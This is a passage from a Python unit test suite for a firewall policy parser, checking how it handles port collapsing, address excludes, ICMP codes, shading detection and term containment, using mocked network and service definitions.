pol = HEADER_V6 + GOOD_TERM_V6_1
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(str(terms[0].hop_limit[0]), '5')
def testHopLimitRange(self):
pol = HEADER_V6 + GOOD_TERM_V6_2
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(str(terms[0].hop_limit[2]), '7')
def testBadPortProtocols(self):
pol = HEADER + BAD_TERM_3
self.naming.GetServiceByProto('SNMP', 'tcp').AndReturn([])
self.assertRaises(
policy.TermPortProtocolError, policy.ParsePolicy, pol, self.naming
)
def testBadPortProtocols2(self):
pol = HEADER + BAD_TERM_4
self.assertRaises(
policy.TermPortProtocolError, policy.ParsePolicy, pol, self.naming
)
def testMinimumTerm(self):
pol = HEADER + GOOD_TERM_5
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(len(terms), 1)
self.assertEqual(str(terms[0].action[0]), 'accept')
def testPortCollapsing(self):
pol = HEADER + GOOD_TERM_6
self.naming.GetServiceByProto.return_value = ['3306']
self.naming.GetServiceByProto.return_value = ['1024-65535']
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertSequenceEqual(terms[0].destination_port, [(1024, 65535)])
self.naming.GetServiceByProto.assert_has_calls(
[mock.call('MYSQL', 'tcp'), mock.call('HIGH_PORTS', 'tcp')],
any_order=True,
)
def testPortCollapsing2(self):
pol = HEADER + GOOD_TERM_8
self.naming.GetServiceByProto.side_effect = [['53'], ['53']]
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertSequenceEqual(terms[0].destination_port, [(53, 53)])
self.naming.GetServiceByProto.assert_has_calls(
[mock.call('DNS', 'tcp'), mock.call('DNS', 'udp')], any_order=True
)
def testMinimumTerm2(self):
pol = HEADER + GOOD_TERM_9
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(str(terms[0].comment[0]), 'first comment')
self.assertEqual(str(terms[0].comment[1]), 'second comment')
def testLogNameTerm(self):
pol = HEADER_6 + GOOD_TERM_37
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(str(terms[0].log_name), 'my special prefix')
def testTermEquality(self):
self.naming.GetNetAddr.side_effect = [
[
nacaddr.IPv4('64.233.160.0/19'),
nacaddr.IPv4('66.102.0.0/20'),
nacaddr.IPv4('66.249.80.0/20'),
nacaddr.IPv4('72.14.192.0/18'),
nacaddr.IPv4('72.14.224.0/20'),
nacaddr.IPv4('216.239.32.0/19'),
],
[nacaddr.IPv4('10.0.0.0/8')],
[nacaddr.IPv4('10.0.0.0/8')],
[
nacaddr.IPv4('64.233.160.0/19'),
nacaddr.IPv4('66.102.0.0/20'),
nacaddr.IPv4('66.249.80.0/20'),
nacaddr.IPv4('72.14.192.0/18'),
nacaddr.IPv4('72.14.224.0/20'),
nacaddr.IPv4('216.239.32.0/19'),
],
[nacaddr.IPv4('10.0.0.0/8')],
[
nacaddr.IPv4('64.233.160.0/19'),
nacaddr.IPv4('66.102.0.0/20'),
nacaddr.IPv4('66.249.80.0/20'),
nacaddr.IPv4('72.14.192.0/18'),
nacaddr.IPv4('72.14.224.0/20'),
nacaddr.IPv4('216.239.32.0/19'),
],
]
self.naming.GetServiceByProto.side_effect = [
['80'],
['3306'],
['3306'],
['80'],
['3306'],
['443'],
]
pol_text = HEADER + GOOD_TERM_19 + GOOD_TERM_20 + GOOD_TERM_21
ret = policy.ParsePolicy(pol_text, self.naming, shade_check=False)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(len(terms), 3)
self.assertEqual(terms[0], terms[1])
self.assertNotEqual(terms[0], terms[2])
self.naming.GetNetAddr.assert_has_calls(
[
mock.call('PROD_EXTERNAL_SUPER'),
mock.call('PROD_NETWRK'),
mock.call('PROD_NETWRK'),
mock.call('PROD_EXTERNAL_SUPER'),
mock.call('PROD_NETWRK'),
mock.call('PROD_EXTERNAL_SUPER'),
],
any_order=True,
)
self.naming.GetServiceByProto.assert_has_calls(
[
mock.call('HTTP', 'tcp'),
mock.call('MYSQL', 'tcp'),
mock.call('MYSQL', 'tcp'),
mock.call('HTTP', 'tcp'),
mock.call('MYSQL', 'tcp'),
mock.call('HTTPS', 'tcp'),
],
any_order=True,
)
def testGoodDestAddrExcludes(self):
pol = HEADER + GOOD_TERM_7
self.naming.GetNetAddr.side_effect = [
[nacaddr.IPv4('10.0.0.0/8')],
[nacaddr.IPv4('10.62.0.0/15')],
]
ret = policy.ParsePolicy(pol, self.naming)
_, terms = ret.filters[0]
self.assertEqual(
terms[0].destination_address_exclude[0], nacaddr.IPv4('10.62.0.0/15')
)
self.naming.GetNetAddr.assert_has_calls(
[mock.call('PROD_NETWRK'), mock.call('PROD_EH')], any_order=True
)
def testGoodSrcAddrExcludes(self):
pol = HEADER + GOOD_TERM_26
self.naming.GetNetAddr.side_effect = [
[nacaddr.IPv4('10.0.0.0/8')],
[nacaddr.IPv4('10.62.0.0/15')],
]
ret = policy.ParsePolicy(pol, self.naming)
_, terms = ret.filters[0]
self.assertEqual(
terms[0].source_address_exclude[0], nacaddr.IPv4('10.62.0.0/15')
)
self.naming.GetNetAddr.assert_has_calls(
[mock.call('PROD_NETWRK'), mock.call('PROD_EH')], any_order=True
)
def testGoodAddrExcludes(self):
pol = HEADER + GOOD_TERM_27
self.naming.GetNetAddr.side_effect = [
[nacaddr.IPv4('10.0.0.0/8')],
[nacaddr.IPv4('10.62.0.0/15')],
]
ret = policy.ParsePolicy(pol, self.naming)
_, terms = ret.filters[0]
self.assertEqual(terms[0].address_exclude[0], nacaddr.IPv4('10.62.0.0/15'))
self.naming.GetNetAddr.assert_has_calls(
[mock.call('PROD_NETWRK'), mock.call('PROD_EH')], any_order=True
)
def testGoodAddrExcludesFlatten(self):
expected = sorted([
nacaddr.IPv4('10.0.0.0/11'),
nacaddr.IPv4('10.32.0.0/12'),
nacaddr.IPv4('10.48.0.0/13'),
nacaddr.IPv4('10.56.0.0/14'),
nacaddr.IPv4('10.60.0.0/15'),
nacaddr.IPv4('10.64.0.0/10'),
nacaddr.IPv4('10.130.0.0/15'),
nacaddr.IPv4('10.132.0.0/14'),
nacaddr.IPv4('10.136.0.0/13'),
nacaddr.IPv4('10.144.0.0/12'),
nacaddr.IPv4('10.160.0.0/11'),
nacaddr.IPv4('10.192.0.0/10'),
])
pol = HEADER + GOOD_TERM_27
self.naming.GetNetAddr.side_effect = [
[nacaddr.IPv4('10.0.0.0/8')],
[
nacaddr.IPv4('10.62.0.0/15'),
nacaddr.IPv4('10.129.0.0/15', strict=False),
],
]
ret = policy.ParsePolicy(pol, self.naming)
_, terms = ret.filters[0]
terms[0].FlattenAll()
self.assertEqual(sorted(terms[0].address), expected)
self.naming.GetNetAddr.assert_has_calls(
[mock.call('PROD_NETWRK'), mock.call('PROD_EH')], any_order=True
)
def testGoodAddrExcludesFlattenMultiple(self):
pol = HEADER + GOOD_TERM_27
self.naming.GetNetAddr.side_effect = [
[
nacaddr.IPv4('10.1.0.0/16'),
nacaddr.IPv4('10.2.0.0/16'),
nacaddr.IPv4('10.3.0.0/16'),
nacaddr.IPv4('192.168.0.0/16'),
],
[nacaddr.IPv4('10.2.0.0/15')],
]
ret = policy.ParsePolicy(pol, self.naming)
_, terms = ret.filters[0]
terms[0].FlattenAll()
self.assertEqual(
terms[0].address,
[nacaddr.IPv4('10.1.0.0/16'), nacaddr.IPv4('192.168.0.0/16')],
)
self.naming.GetNetAddr.assert_has_calls(
[mock.call('PROD_NETWRK'), mock.call('PROD_EH')], any_order=True
)
def testGoodAddrExcludesFlattenAll(self):
pol = HEADER + GOOD_TERM_27
self.naming.GetNetAddr.side_effect = [
[
nacaddr.IPv4('10.1.0.0/16'),
nacaddr.IPv4('10.2.0.0/16'),
nacaddr.IPv4('10.3.0.0/16'),
],
[nacaddr.IPv4('10.0.0.0/8')],
]
ret = policy.ParsePolicy(pol, self.naming)
_, terms = ret.filters[0]
terms[0].FlattenAll()
self.assertEqual(terms[0].address, [])
self.naming.GetNetAddr.assert_has_calls(
[mock.call('PROD_NETWRK'), mock.call('PROD_EH')], any_order=True
)
def testLogging(self):
pol = HEADER + GOOD_TERM_10
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(str(terms[0].logging[0]), 'true')
def testBadLogging(self):
pol = HEADER + BAD_TERM_6
self.assertRaises(
policy.InvalidTermLoggingError, policy.ParsePolicy, pol, self.naming
)
def testBadAction(self):
pol = HEADER + BAD_TERM_7
self.assertRaises(
policy.InvalidTermActionError, policy.ParsePolicy, pol, self.naming
)
def testMultifilter(self):
pol = HEADER + GOOD_TERM_1 + HEADER_2 + GOOD_TERM_1
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.headers), 2)
def testBadMultifilter(self):
pol = HEADER + HEADER_2 + GOOD_TERM_1
self.assertRaises(policy.NoTermsError, policy.ParsePolicy, pol, self.naming)
def testICMPTypes(self):
pol = HEADER + GOOD_TERM_11
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(terms[0].icmp_type[0], 'echo-reply')
def testBadICMPTypes(self):
pol = HEADER + BAD_TERM_12
self.assertRaises(
policy.TermInvalidIcmpType, policy.ParsePolicy, pol, self.naming
)
def testICMPTypesSorting(self):
pol = HEADER + TERM_UNSORTED_ICMP_TYPE
ret = policy.ParsePolicy(pol, self.naming)
icmp_types = ['echo-reply', 'echo-request', 'unreachable']
expected = 'icmp_type: %s' % icmp_types
self.assertIn(expected, str(ret))
def testICMPCodesSorting(self):
pol = HEADER + TERM_UNSORTED_ICMP_CODE
ret = policy.ParsePolicy(pol, self.naming)
self.assertIn('icmp_code: [1, 4, 9, 15]', str(ret))
def testReservedWordTermName(self):
pol = HEADER + GOOD_TERM_12
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(terms[0].qos, 'af4')
self.assertEqual(terms[0].name, 'qos-good-term-12')
def testMultiPortLines(self):
pol = HEADER + GOOD_TERM_13
self.naming.GetServiceByProto.side_effect = [['22', '160-162'], ['161']]
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertSequenceEqual(terms[0].source_port, [(22, 22), (160, 162)])
self.naming.GetServiceByProto.assert_has_calls(
[mock.call('GOOGLE_PUBLIC', 'udp'), mock.call('SNMP', 'udp')],
any_order=True,
)
def testErrorLineNumber(self):
pol = HEADER + GOOD_TERM_13 + BAD_TERM_8
self.assertRaisesRegex(
policy.ParseError,
r'ERROR on "akshun" \(type STRING, line 1',
policy.ParsePolicy,
pol,
self.naming,
)
def testPrefixList(self):
spol = HEADER + GOOD_TERM_14
dpol = HEADER + GOOD_TERM_15
# check on the source prefix list
ret = policy.ParsePolicy(spol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(terms[0].source_prefix, ['foo_prefix_list'])
# check on the destination prefix list
ret = policy.ParsePolicy(dpol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(
terms[0].destination_prefix, ['bar_prefix_list', 'baz_prefix_list']
)
def testPrefixListExcept(self):
spol = HEADER + GOOD_TERM_38
dpol = HEADER + GOOD_TERM_39
# check on the source prefix except list
ret = policy.ParsePolicy(spol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(terms[0].source_prefix_except, ['foo_prefix_list'])
# check on the destination prefix except list
ret = policy.ParsePolicy(dpol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(
terms[0].destination_prefix_except,
['bar_prefix_list', 'baz_prefix_list'],
)
def testPrefixListMixed(self):
spol = HEADER + GOOD_TERM_40
dpol = HEADER + GOOD_TERM_41
# check on the source prefix list with mixed values
ret = policy.ParsePolicy(spol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(terms[0].source_prefix, ['foo_prefix_list'])
self.assertEqual(terms[0].source_prefix_except, ['foo_prefix_list_except'])
# check on the destination prefix with mixed values
ret = policy.ParsePolicy(dpol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(terms[0].destination_prefix, ['bar_prefix_list'])
self.assertEqual(
terms[0].destination_prefix_except, ['bar_prefix_list_except']
)
def testEtherTypes(self):
pol = HEADER + GOOD_TERM_16
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(terms[0].ether_type[0], 'arp')
self.assertEqual(terms[0].ether_type[1], 'ipv4')
self.assertEqual(terms[0].ether_type[2], 'vlan')
def testTrafficTypes(self):
pol = HEADER + GOOD_TERM_17
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(terms[0].traffic_type[0], 'broadcast')
self.assertEqual(terms[0].traffic_type[1], 'unknown-unicast')
self.assertEqual(terms[0].traffic_type[2], 'multicast')
def testBadProtocolEtherTypes(self):
pol = HEADER + BAD_TERM_9
self.assertRaises(
policy.TermProtocolEtherTypeError, policy.ParsePolicy, pol, self.naming
)
def testVerbatimTerm(self):
pol = policy.ParsePolicy(HEADER + GOOD_TERM_18, self.naming)
_, terms = pol.filters[0]
self.assertEqual(terms[0].verbatim[0][0], 'iptables')
self.assertEqual(terms[0].verbatim[0][1], 'mary had a little lamb')
self.assertEqual(terms[0].verbatim[1][0], 'juniper')
self.assertEqual(terms[0].verbatim[1][1], 'mary had another lamb')
def testVerbatimMixed(self):
pol = HEADER + BAD_TERM_10
self.assertRaises(policy.ParseError, policy.ParsePolicy, pol, self.naming)
def testIntegerFilterName(self):
pol_text = HEADER_3 + GOOD_TERM_0
pol = policy.ParsePolicy(pol_text, self.naming)
self.assertEqual(pol.headers[0].target[0].options[0], '50')
def testPrecedence(self):
pol_text = HEADER + GOOD_TERM_22
pol = policy.ParsePolicy(pol_text, self.naming)
self.assertEqual(len(pol.filters), 1)
_, terms = pol.filters[0]
self.assertEqual(terms[0].precedence, [1])
def testLossPriority(self):
self.naming.GetServiceByProto.return_value = ['22']
pol = policy.ParsePolicy(HEADER + GOOD_TERM_23, self.naming)
self.assertEqual(len(pol.filters), 1)
_, terms = pol.filters[0]
self.assertEqual(terms[0].loss_priority, 'low')
self.naming.GetServiceByProto.assert_called_once_with('SSH', 'tcp')
def testRoutingInstance(self):
self.naming.GetServiceByProto.return_value = ['22']
pol = policy.ParsePolicy(HEADER + GOOD_TERM_24, self.naming)
self.assertEqual(len(pol.filters), 1)
_, terms = pol.filters[0]
self.assertEqual(terms[0].routing_instance, 'foobar-router')
self.naming.GetServiceByProto.assert_called_once_with('SSH', 'tcp')
def testSourceInterface(self):
self.naming.GetServiceByProto.return_value = ['22']
pol = policy.ParsePolicy(HEADER_4 + GOOD_TERM_25, self.naming)
self.assertEqual(len(pol.filters), 1)
header, terms = pol.filters[0]
self.assertEqual(str(header.target[0]), 'iptables')
self.assertEqual(terms[0].source_interface, 'foo0')
self.naming.GetServiceByProto.assert_called_once_with('SSH', 'tcp')
def testShadingDetection(self):
pol2 = HEADER + GOOD_TERM_2 + GOOD_TERM_3
self.naming.GetNetAddr.side_effect = [
[nacaddr.IPv4('10.0.0.0/8')],
[nacaddr.IPv4('10.0.0.0/8')],
]
self.naming.GetServiceByProto.return_value = ['25']
# same protocol, same saddr, shaded term defines a port.
self.assertRaises(
policy.ShadingError,
policy.ParsePolicy,
pol2,
self.naming,
shade_check=True,
)
self.naming.GetNetAddr.assert_has_calls(
[mock.call('PROD_NETWRK'), mock.call('PROD_NETWRK')]
)
self.naming.GetServiceByProto.assert_called_once_with('SMTP', 'tcp')
def testVpnConfigWithoutPairPolicy(self):
pol = policy.ParsePolicy(HEADER_4 + GOOD_TERM_30, self.naming)
self.assertEqual(len(pol.filters), 1)
self.assertEqual('special-30', pol.filters[0][1][0].vpn[0])
self.assertEqual('', pol.filters[0][1][0].vpn[1])
def testVpnConfigWithPairPolicy(self):
pol = policy.ParsePolicy(HEADER_4 + GOOD_TERM_31, self.naming)
self.assertEqual(len(pol.filters), 1)
self.assertEqual('special-31', pol.filters[0][1][0].vpn[0])
self.assertEqual('policy-11', pol.filters[0][1][0].vpn[1])
def testForwardingClassPolicy(self):
pol = policy.ParsePolicy(HEADER + GOOD_TERM_32, self.naming)
self.assertEqual(['fritzy'], pol.filters[0][1][0].forwarding_class)
def testMultipleForwardingClassPolicy(self):
pol = policy.ParsePolicy(HEADER + GOOD_TERM_36, self.naming)
self.assertEqual(
['flashy', 'fritzy'], pol.filters[0][1][0].forwarding_class
)
def testForwardingClassEqual(self):
pol_text = HEADER + GOOD_TERM_32 + GOOD_TERM_33
ret = policy.ParsePolicy(pol_text, self.naming, shade_check=False)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(len(terms), 2)
self.assertNotEqual(terms[0], terms[1])
def testTagSupportAndNetworkHeaderParsing(self):
pol = policy.ParsePolicy(HEADER_5 + GOOD_TERM_34, self.naming)
self.assertEqual(len(pol.filters), 1)
header, terms = pol.filters[0]
self.assertEqual(str(header.target[0]), 'gce')
self.assertEqual(header.FilterOptions('gce'), ['global/networks/default'])
self.assertEqual(terms[0].source_tag, ['src-tag'])
self.assertEqual(terms[0].destination_tag, ['dest-tag'])
def testEq(self):
"""Sanity test to verify __eq__ works on Policy objects."""
policy1 = policy.ParsePolicy(HEADER_4 + GOOD_TERM_30, self.naming)
policy2 = policy.ParsePolicy(HEADER_4 + GOOD_TERM_30, self.naming)
policy3 = policy.ParsePolicy(HEADER_5 + GOOD_TERM_34, self.naming)
self.assertEqual(policy1, policy2)
self.assertNotEqual(policy1, policy3)
self.assertNotEqual(policy2, policy3)
def testNextIP(self):
pol = HEADER_2 + GOOD_TERM_35
expected = nacaddr.IPv4('10.1.1.1/32')
self.naming.GetNetAddr.side_effect = [
[nacaddr.IPv4('10.0.0.0/8')],
[nacaddr.IPv4('10.1.1.1/32')],
]
result = policy.ParsePolicy(pol, self.naming)
self.assertEqual(result.filters[0][1][0].next_ip[0], expected)
self.naming.GetNetAddr.assert_has_calls(
[mock.call('PROD_NETWRK'), mock.call('NEXT_IP')]
)
def testStr(self):
"""Sanity test to verify __eq__ works on Policy objects."""
pol = policy.ParsePolicy(HEADER_4 + GOOD_TERM_30, self.naming)
logging.info("Ensuring string formatting doesn't throw errors: %s", pol)
def testTermAddressByteLength(self):
"""Tests the AddressByteLength function."""
pol = HEADER + GOOD_TERM_2
self.naming.GetNetAddr.return_value = [
nacaddr.IPv4('10.0.0.1/32'),
nacaddr.IPv4('10.0.0.2/32'),
nacaddr.IPv6('2001:4860:4860::8844/128'),
nacaddr.IPv6('2001:4860:4860::8888/128'),
]
ret = policy.ParsePolicy(pol, self.naming)
term = ret.filters[0][1][0]
self.assertEqual(2, term.AddressesByteLength([4]))
self.assertEqual(8, term.AddressesByteLength([6]))
self.assertEqual(10, term.AddressesByteLength())
# pylint: enable=maybe-no-member
def testICMPCodes(self):
pol = HEADER + GOOD_TERM_42
result = policy.ParsePolicy(pol, self.naming)
self.assertIn('icmp_code: [3, 4]', str(result))
def testBadICMPCodes(self):
pol = HEADER + BAD_TERM_13
pol2 = HEADER + BAD_TERM_14
self.assertRaises(
policy.ICMPCodeError, policy.ParsePolicy, pol, self.naming
)
self.assertRaises(
policy.ICMPCodeError, policy.ParsePolicy, pol2, self.naming
)
def testOptimizedConsistency(self):
pol = HEADER + GOOD_TERM_2 + GOOD_TERM_3
unoptimized_addr = [
nacaddr.IPv4('10.16.128.6/32'),
nacaddr.IPv4('10.16.128.7/32'),
]
optimized_addr = nacaddr.CollapseAddrList(unoptimized_addr)
self.naming.GetNetAddr.return_value = unoptimized_addr
self.naming.GetServiceByProto.return_value = ['25']
ret_unoptimized = policy.ParsePolicy(pol, self.naming, optimize=False)
self.assertFalse(policy._OPTIMIZE)
ret_optimized = policy.ParsePolicy(pol, self.naming)
self.assertTrue(policy._OPTIMIZE)
for _, terms in ret_unoptimized.filters:
for term in terms:
self.assertEqual(unoptimized_addr, term.source_address)
for _, terms in ret_optimized.filters:
for term in terms:
self.assertEqual(optimized_addr, term.source_address)
def testShadeCheckConsistency(self):
pol = HEADER + TERM_SUPER_3 + TERM_SUB_2
self.assertRaises(
policy.ShadingError,
policy.ParsePolicy,
pol,
self.naming,
shade_check=True,
)
self.assertTrue(policy._SHADE_CHECK)
_ = policy.ParsePolicy(pol, self.naming)
self.assertFalse(policy._SHADE_CHECK)
def testEncapsulate(self):
pol = HEADER + GOOD_TERM_46
result = policy.ParsePolicy(pol, self.naming)
self.assertIn('encapsulate: stuff_and_things', str(result))
def testDecapsulate(self):
pol = HEADER + GOOD_TERM_49
result = policy.ParsePolicy(pol, self.naming)
self.assertIn('decapsulate: mpls-in-udp', str(result))
def testPortMirror(self):
pol = HEADER + GOOD_TERM_47
result = policy.ParsePolicy(pol, self.naming)
self.assertIn('port_mirror: true', str(result))
def testSrxGLobalZone(self):
pol = HEADER + GOOD_TERM_48
result = policy.ParsePolicy(pol, self.naming)
zones = ['zone1', 'zone2']
expected_source = 'source_zone: %s' % zones
expected_destination = 'destination_zone: %s' % zones
self.assertIn(expected_source, str(result))
self.assertIn(expected_destination, str(result))
def testTTL(self):
pol = HEADER + GOOD_TERM_43
result = policy.ParsePolicy(pol, self.naming)
self.assertIn('ttl: 10', str(result))
def testInvalidTTL(self):
pol = HEADER + BAD_TERM_15
self.assertRaises(
policy.InvalidTermTTLValue, policy.ParsePolicy, pol, self.naming
)
def testNeedAddressBook(self):
pol1 = policy.ParsePolicy(HEADER + GOOD_TERM_1, self.naming)
pol2 = policy.ParsePolicy(HEADER_SRX + GOOD_TERM_1, self.naming)
pol3 = policy.ParsePolicy(HEADER_OBJ_GRP + GOOD_TERM_1, self.naming)
pol4 = policy.ParsePolicy(HEADER_ADDRBOOK_MIXED + GOOD_TERM_1, self.naming)
self.assertFalse(pol1._NeedsAddressBook())
self.assertTrue(pol2._NeedsAddressBook())
self.assertTrue(pol3._NeedsAddressBook())
self.assertTrue(pol4._NeedsAddressBook())
def testAddressCleanupCorrect(self):
unoptimized_addr = [
nacaddr.IPv4('10.16.128.6/32', token='FOO'),
nacaddr.IPv4('10.16.128.7/32', token='BAR'),
]
self.naming.GetNetAddr.return_value = unoptimized_addr
pol = policy.ParsePolicy(HEADER + GOOD_TERM_2, self.naming)
term = pol.filters[0][1][0]
self.assertEqual(
nacaddr.CollapseAddrList(unoptimized_addr), term.source_address
)
pol = policy.ParsePolicy(HEADER_SRX + GOOD_TERM_2, self.naming)
term = pol.filters[0][1][0]
self.assertEqual(
nacaddr.CollapseAddrListPreserveTokens(unoptimized_addr),
term.source_address,
)
def testLogLimit(self):
pol = policy.ParsePolicy(HEADER_4 + GOOD_TERM_44, self.naming)
term = pol.filters[0][1][0]
self.assertEqual(('999', 'day'), term.log_limit)
def testGREandTCPUDPError(self):
pol = HEADER + BAD_TERM_16
self.naming.GetServiceByProto.return_value = ['25']
self.assertRaises(
policy.MixedPortandNonPortProtos, policy.ParsePolicy, pol, self.naming
)
def testSourceServiceAccount(self):
pol = HEADER_HF_1 + GOOD_TERM_50
result = policy.ParsePolicy(pol, self.naming)
term = result.filters[0][1][0]
self.assertEqual(['acct1@blah.com'], term.source_service_accounts)
def testTargetServiceAccount(self):
pol = HEADER_HF_1 + GOOD_TERM_45
result = policy.ParsePolicy(pol, self.naming)
term = result.filters[0][1][0]
self.assertEqual(['acct1@blah.com'], term.target_service_accounts)
# Contains Tests
def testVerbatimContains(self):
term_one = policy.Term(policy.VarType(23, ('iptables', 'foo')))
term_two = policy.Term(policy.VarType(23, ('iptables', 'bar')))
term_three = policy.Term(policy.VarType(23, ('juniper', 'foo')))
self.assertIn(term_one, term_one)
self.assertNotIn(term_two, term_one)
self.assertNotIn(term_three, term_one)
@mock.patch.object(policy, 'DEFINITIONS')
def testIpAndPortContains(self, mock_naming):
mock_naming.GetNetAddr.side_effect = [
[nacaddr.IPv4('10.0.0.0/8')],
[nacaddr.IPv4('10.1.1.1/32')],
]
term_one = policy.Term([
policy.VarType(3, 'PROD'),
policy.VarType(7, (22, 22)),
policy.VarType(7, (80, 80)),
policy.VarType(10, 'tcp'),
])
term_one.AddObject(policy.VarType(2, 'accept'))
term_two = policy.Term([
policy.VarType(3, 'SMALLER_PROD'),
policy.VarType(7, (22, 22)),
policy.VarType(10, 'tcp'),
])
term_two.AddObject(policy.VarType(2, 'accept'))
self.assertIn(term_two, term_one)
self.assertNotIn(term_one, term_two)
@mock.patch.object(policy, 'DEFINITIONS')
def testEmptyIpContains(self, mock_naming):
# testTermContains2 differs from testTermContains in that TERM_SUPER_2
# only defines a source addres. it's meant to catch the case where
# the containing term has less detail (and is hence, less restrictive)
# than the contained term
mock_naming.GetNetAddr.side_effect = [
[nacaddr.IPv4('10.0.0.0/8')],
[nacaddr.IPv4('10.1.1.1/32')],
]
term_one = policy.Term([policy.VarType(5, 'PROD')])
term_one.AddObject(policy.VarType(2, 'accept'))
term_two = policy.Term(
[policy.VarType(3, 'SMALLER_PROD'), policy.VarType(7, (22, 22))]
)
term_two.AddObject(policy.VarType(2, 'accept'))
self.assertIn(term_two, term_one)
self.assertNotIn(term_one, term_two)
@mock.patch.object(policy, 'DEFINITIONS')
def testIpExcludeContains(self, mock_naming):
# This 'contains' test kicks the tires on source-address and
# source-address-exclude.
mock_naming.GetNetAddr.side_effect = [
[nacaddr.IPv4('10.0.0.0/8')],
[nacaddr.IPv4('10.0.0.0/8')],
[nacaddr.IPv4('10.62.0.0/15')],
]
term_one = policy.Term([policy.VarType(3, 'FOO')])
term_two = policy.Term(
[policy.VarType(3, 'FOO'), policy.VarType(11, 'BAR')]
)
self.assertIn(term_two, term_one)
self.assertNotIn(term_one, term_two)
@mock.patch.object(policy, 'DEFINITIONS')
def testIpDualExcludeContains(self, mock_naming):
# One term has (10.0.0.0/8, except 10.10.0.0/24), it should contain a term
# that has (10.0.0.0/8 except 10.0.0.0/9.
mock_naming.GetNetAddr.side_effect = [
[nacaddr.IPv4('10.0.0.0/8')],
[nacaddr.IPv4('10.10.0.0/24')],
[nacaddr.IPv4('10.0.0.0/8')],
[nacaddr.IPv4('10.0.0.0/9')],
]
term_one = policy.Term(
[policy.VarType(3, 'FOO'), policy.VarType(11, 'BAR')]
)
term_two = policy.Term(
[policy.VarType(3, 'FOO'), policy.VarType(11, 'BAR')]
)
self.assertIn(term_two, term_one)
self.assertNotIn(term_one, term_two)
def testOptionsContains(self):
# Tests 'contains' testing of the options field. A term without set options
# contains one which has them set.
tcp_est_term = policy.Term([policy.VarType(9, 'tcp-established')])
term = policy.Term([])
tcp_udp_est_term = policy.Term(
[policy.VarType(9, 'tcp-established'), policy.VarType(9, 'established')]
)
self.assertNotIn(term, tcp_est_term)
self.assertNotIn(tcp_est_term, term)
self.assertIn(tcp_est_term, tcp_udp_est_term)
self.assertNotIn(tcp_udp_est_term, tcp_est_term)
def testPrecedenceContains(self):
# Tests 'contains' testing of the precedence field. A term without set
# precedence contains one which has them set.
p_term = policy.Term([policy.VarType(26, 1)])
no_p_term = policy.Term([])
self.assertIn(p_term, p_term)
self.assertIn(no_p_term, no_p_term)
self.assertNotIn(no_p_term, p_term)
self.assertNotIn(p_term, no_p_term)
def testProtocolExceptContains(self):
# Test the protocol-except keyword.
pexcept_term = policy.Term([policy.VarType(8, 'tcp')])
pexpect_term_udp = policy.Term([policy.VarType(8, 'udp')])
p_term = policy.Term([policy.VarType(10, 'icmp')])
p_term_tcp = policy.Term([policy.VarType(10, 'tcp')])
self.assertIn(p_term, pexcept_term)
self.assertIn(pexcept_term, pexcept_term)
self.assertNotIn(p_term_tcp, pexcept_term)
self.assertNotIn(pexpect_term_udp, pexcept_term)
def testProtocolTermNotInAnotherTermContains(self):
term_one = policy.Term([policy.VarType(10, 'tcp')])
term_two = policy.Term([policy.VarType(10, 'udp')])
self.assertNotIn(term_one, term_two)
def testTargetServiceAccountContains(self):
two_target_sa = ['acct1@blah.com', 'acct2@blah.com']
one_target_sa = ['acct3@blah.com']
term = policy.Term([policy.VarType(60, two_target_sa)])
self.assertIn(two_target_sa, term.target_service_accounts)
term.AddObject(policy.VarType(60, one_target_sa))
self.assertIn(one_target_sa, term.target_service_accounts)
def testProtoExceptNotInEmptyTerm(self):
term_one = policy.Term([policy.VarType(8, 'tcp')])
term_two = policy.Term([])
self.assertNotIn(term_two, term_one)
def testProtocolNotInProtoExcept(self):
term_one = policy.Term([policy.VarType(8, 'tcp')])
term_two = policy.Term([policy.VarType(10, 'udp')])
self.assertNotIn(term_one, term_two)
def testProtocolNotInEmptyTerm(self):
term_one = policy.Term([policy.VarType(10, 'tcp')])
term_two = policy.Term([])
self.assertNotIn(term_two, term_one)
@mock.patch.object(policy, 'DEFINITIONS')
def testAddrNotInAddr(self, mock_naming):
mock_naming.GetNetAddr.side_effect = [
[nacaddr.IPv4('192.168.1.1/32')],
[nacaddr.IPv4('10.1.1.0/24')],
[nacaddr.IPv4('10.1.1.0/24')],
